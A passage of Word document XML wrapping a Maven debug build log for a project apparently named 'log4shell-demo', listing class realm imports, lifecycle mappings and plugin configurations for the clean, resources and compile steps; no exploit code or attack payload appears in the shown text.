    </w:p>
    <w:p w14:paraId="1B7312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org.apache.maven.wagon.authorization &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288946D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org.apache.maven.wagon.events &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570253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org.apache.maven.wagon.observers &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A515B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org.apache.maven.wagon.proxy &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2826B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org.apache.maven.wagon.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3560EA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org.apache.maven.wagon.resource &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6216014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org.codehaus.classworlds &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BAB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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934FB9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org.codehaus.plexus.classworlds &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A576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org.codehaus.plexus.component &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4AD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org.codehaus.plexus.configuration &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52314A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org.codehaus.plexus.container &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FBFE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org.codehaus.plexus.context &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4250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org.codehaus.plexus.lifecycle &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D4B5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org.codehaus.plexus.logging &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F111D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org.codehaus.plexus.personality &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF4F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org.codehaus.plexus.util.xml.Xpp3Dom &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268317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org.codehaus.plexus.util.xml.pull.XmlPullParser &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2FBF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Imported: org.codehaus.plexus.util.xml.pull.XmlPullParserException &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4D7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org.codehaus.plexus.util.xml.pull.XmlSerializer &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E228E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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6DB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org.eclipse.aether.artifact &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE4963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org.eclipse.aether.collection &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2563970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org.eclipse.aether.deployment &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A568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org.eclipse.aether.graph &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5D70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org.eclipse.aether.impl &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67063C0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org.eclipse.aether.installation &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753972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org.eclipse.aether.internal.impl &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FD58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org.eclipse.aether.metadata &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40065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org.eclipse.aether.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F3B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org.eclipse.aether.resolution &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECA4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org.eclipse.aether.spi &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170F6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org.eclipse.aether.transfer &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEF10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org.eclipse.aether.version &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931026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org.fusesource.jansi.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38358B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org.slf4j.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792DBBB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org.slf4j.event.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A869A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org.slf4j.helpers.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB47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org.slf4j.spi.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05199F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Populating class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431503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Error stacktraces are turned on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184342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Message scheme: color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67575D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Message styles: debug info warning error success failure strong mojo project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB5E9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Reading global settings from /usr/share/maven/conf/settings.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382956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Reading user settings from /home/ec2-user/.m2/settings.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2A4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Reading global toolchains from /usr/share/maven/conf/toolchains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D44F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Reading user toolchains from /home/ec2-user/.m2/toolchains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459ABB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Using local repository at /home/ec2-user/.m2/repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2370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manager EnhancedLocalRepositoryManager with priority 10.0 for /home/ec2-user/.m2/repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A688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4DCD50F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Extension realms for project com.example:log4shell-demo:jar:0.0.1-SNAPSHOT: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7B5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Looking up lifecycle mappings for packaging jar from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD4D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Extension realms for project org.springframework.boot:spring-boot-starter-parent:pom:2.5.5: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E366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Looking up lifecycle mappings for packaging pom from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ED06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Extension realms for project org.springframework.boot:spring-boot-dependencies:pom:2.5.5: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2984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Looking up lifecycle mappings for packaging pom from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB50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REACTOR BUILD PLAN ================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210A7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Project: com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB15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Tasks:   [clean, package]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9C6F7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Style:   Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186DA9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421EFC6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9C56B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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC6C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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E658F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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4937C90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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C26F63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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC087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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E184C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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65440C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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAEEC0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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A0BB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Lifecycle default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38AA7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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFCB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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F8F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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D476A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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C46F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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDD3F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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9452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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FD41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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51997E0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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0883D6E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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D88DB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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1CD5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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE97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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F43A6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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154EB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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D305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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07911D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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6526838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Lifecycle default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119156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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA5F8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Lifecycle site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4631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PROJECT BUILD PLAN ================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ECA0F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Project:       com.example:log4shell-demo:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E761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Dependencies (collect): [compile+runtime]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9CA8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Dependencies (resolve): [compile, compile+runtime, runtime, test]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080111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Repositories (dependencies): [central (https://repo.maven.apache.org/maven2, default, releases)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1999B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Repositories (plugins)     : [central (https://repo.maven.apache.org/maven2, default, releases)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A31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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B54F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Goal:          org.apache.maven.plugins:maven-clean-plugin:3.1.0:clean (default-clean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C22A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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E0C8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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656825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677AD8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&lt;directory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC737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&lt;excludeDefaultDirectories default-value="false"&gt;${maven.clean.excludeDefaultDirectories}&lt;/excludeDefaultDirectories&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7A1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&lt;failOnError default-value="true"&gt;${maven.clean.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F534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&lt;followSymLinks default-value="false"&gt;${maven.clean.followSymLinks}&lt;/followSymLinks&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE753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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0413B75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&lt;reportDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C6D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&lt;retryOnError default-value="true"&gt;${maven.clean.retryOnError}&lt;/retryOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AAED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 default-value="false"&gt;${maven.clean.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CCA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&lt;testOutputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C6F76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&lt;verbose&gt;${maven.clean.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530DE6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57457D8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECC0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Goal:          org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources (default-resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A33F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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CAFB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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2390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2E7014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&lt;addDefaultExcludes default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD906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&lt;buildFilters default-value="${project.build.filters}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE12D0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&lt;delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75884E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&lt;delimiter&gt;@&lt;/delimiter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F447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&lt;/delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756196A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&lt;encoding default-value="${project.build.sourceEncoding}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDDDC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&lt;escapeWindowsPaths default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494E3A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&lt;fileNameFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592451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&lt;includeEmptyDirs default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61593B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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374E8C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&lt;overwrite default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B695E6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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7456AB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&lt;propertiesEncoding&gt;UTF-8&lt;/propertiesEncoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCFA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&lt;resources default-value="${project.resources}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325CD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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4835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 default-value="false"&gt;${maven.resources.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949D4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&lt;supportMultiLineFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061D2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&lt;useBuildFilters default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E009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&lt;useDefaultDelimiters default-value="true"&gt;false&lt;/useDefaultDelimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7E6A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59B89F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC66E9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Goal:          org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile (default-compile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498CFB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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F38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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374159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611022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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302D7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&lt;buildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17C5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&lt;compilePath default-value="${project.compileClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1138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&lt;compileSourceRoots default-value="${project.compileSourceRoots}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AC401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&lt;compilerId default-value="javac"&gt;${maven.compiler.compilerId}&lt;/compilerId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24B42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&lt;compilerReuseStrategy default-value="${reuseCreated}"&gt;${maven.compiler.compilerReuseStrategy}&lt;/compilerReuseStrategy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47206D0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&lt;compilerVersion&gt;${maven.compiler.compilerVersion}&lt;/compilerVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420266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&lt;debug default-value="true"&gt;${maven.compiler.debug}&lt;/debug&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711989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&lt;debuglevel&gt;${maven.compiler.debuglevel}&lt;/debuglevel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCF5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&lt;encoding default-value="${project.build.sourceEncoding}"&gt;${encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11CF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&lt;executable&gt;${maven.compiler.executable}&lt;/executable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E1B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&lt;failOnError default-value="true"&gt;${maven.compiler.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56458B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&lt;failOnWarning default-value="false"&gt;${maven.compiler.failOnWarning}&lt;/failOnWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45068F6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&lt;forceJavacCompilerUse default-value="false"&gt;${maven.compiler.forceJavacCompilerUse}&lt;/forceJavacCompilerUse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B79E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&lt;fork default-value="false"&gt;${maven.compiler.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49B1E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&lt;generatedSourcesDirectory default-value="${project.build.directory}/generated-sources/annotations"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0839E2D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&lt;maxmem&gt;${maven.compiler.maxmem}&lt;/maxmem&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC07E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&lt;meminitial&gt;${maven.compiler.meminitial}&lt;/meminitial&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B126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&lt;mojoExecution default-value="${mojoExecution}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C10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&lt;optimize default-value="false"&gt;${maven.compiler.optimize}&lt;/optimize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167085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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C099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&lt;parameters default-value="false"&gt;true&lt;/parameters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4CD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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC9C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&lt;projectArtifact default-value="${project.artifact}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286589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&lt;release&gt;${maven.compiler.release}&lt;/release&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A641D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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3ED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&lt;showDeprecation default-value="false"&gt;${maven.compiler.showDeprecation}&lt;/showDeprecation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F14C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&lt;showWarnings default-value="false"&gt;${maven.compiler.showWarnings}&lt;/showWarnings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0C84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&lt;skipMain&gt;${maven.main.skip}&lt;/skipMain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439D4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&lt;skipMultiThreadWarning default-value="false"&gt;${maven.compiler.skipMultiThreadWarning}&lt;/skipMultiThreadWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69908F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&lt;source default-value="1.6"&gt;${maven.compiler.source}&lt;/source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB585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&lt;staleMillis default-value="0"&gt;${lastModGranularityMs}&lt;/staleMillis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390974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&lt;target default-value="1.6"&gt;${maven.compiler.target}&lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD94D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&lt;useIncrementalCompilation default-value="true"&gt;${maven.compiler.useIncrementalCompilation}&lt;/useIncrementalCompilation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6F8D5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&lt;verbose default-value="false"&gt;${maven.compiler.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E84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25761FD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB058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Goal:          org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources (default-testResources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4D12D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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D96B3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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF23EF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3165A5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&lt;addDefaultExcludes default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238452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&lt;buildFilters default-value="${project.build.filters}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264D4C1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&lt;delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6DCA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&lt;delimiter&gt;@&lt;/delimiter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550351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&lt;/delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47C7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&lt;encoding default-value="${project.build.sourceEncoding}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC599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&lt;escapeWindowsPaths default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36985AC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&lt;fileNameFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDF32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&lt;includeEmptyDirs default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46997B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&lt;outputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A95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&lt;overwrite default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B75B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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3243AF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&lt;propertiesEncoding&gt;UTF-8&lt;/propertiesEncoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B42E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&lt;resources default-value="${project.testResources}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405DBF3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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D3C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&lt;skip default-value="false"&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7A88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&lt;supportMultiLineFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C339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&lt;useBuildFilters default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174C8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&lt;useDefaultDelimiters default-value="true"&gt;false&lt;/useDefaultDelimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6830C1A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318263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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723525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Goal:          org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile (default-testCompile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF15AE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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539C38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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E3F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71B437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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCC63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&lt;buildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD7F8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&lt;compilePath default-value="${project.compileClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7148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&lt;compileSourceRoots default-value="${project.testCompileSourceRoots}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807E7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&lt;compilerId default-value="javac"&gt;${maven.compiler.compilerId}&lt;/compilerId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D320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&lt;compilerReuseStrategy default-value="${reuseCreated}"&gt;${maven.compiler.compilerReuseStrategy}&lt;/compilerReuseStrategy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B3CC6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&lt;compilerVersion&gt;${maven.compiler.compilerVersion}&lt;/compilerVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB500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&lt;debug default-value="true"&gt;${maven.compiler.debug}&lt;/debug&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E04B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&lt;debuglevel&gt;${maven.compiler.debuglevel}&lt;/debuglevel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0AF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&lt;encoding default-value="${project.build.sourceEncoding}"&gt;${encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BEC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&lt;executable&gt;${maven.compiler.executable}&lt;/executable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165951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&lt;failOnError default-value="true"&gt;${maven.compiler.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA944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&lt;failOnWarning default-value="false"&gt;${maven.compiler.failOnWarning}&lt;/failOnWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA58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&lt;forceJavacCompilerUse default-value="false"&gt;${maven.compiler.forceJavacCompilerUse}&lt;/forceJavacCompilerUse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EED1E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&lt;fork default-value="false"&gt;${maven.compiler.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
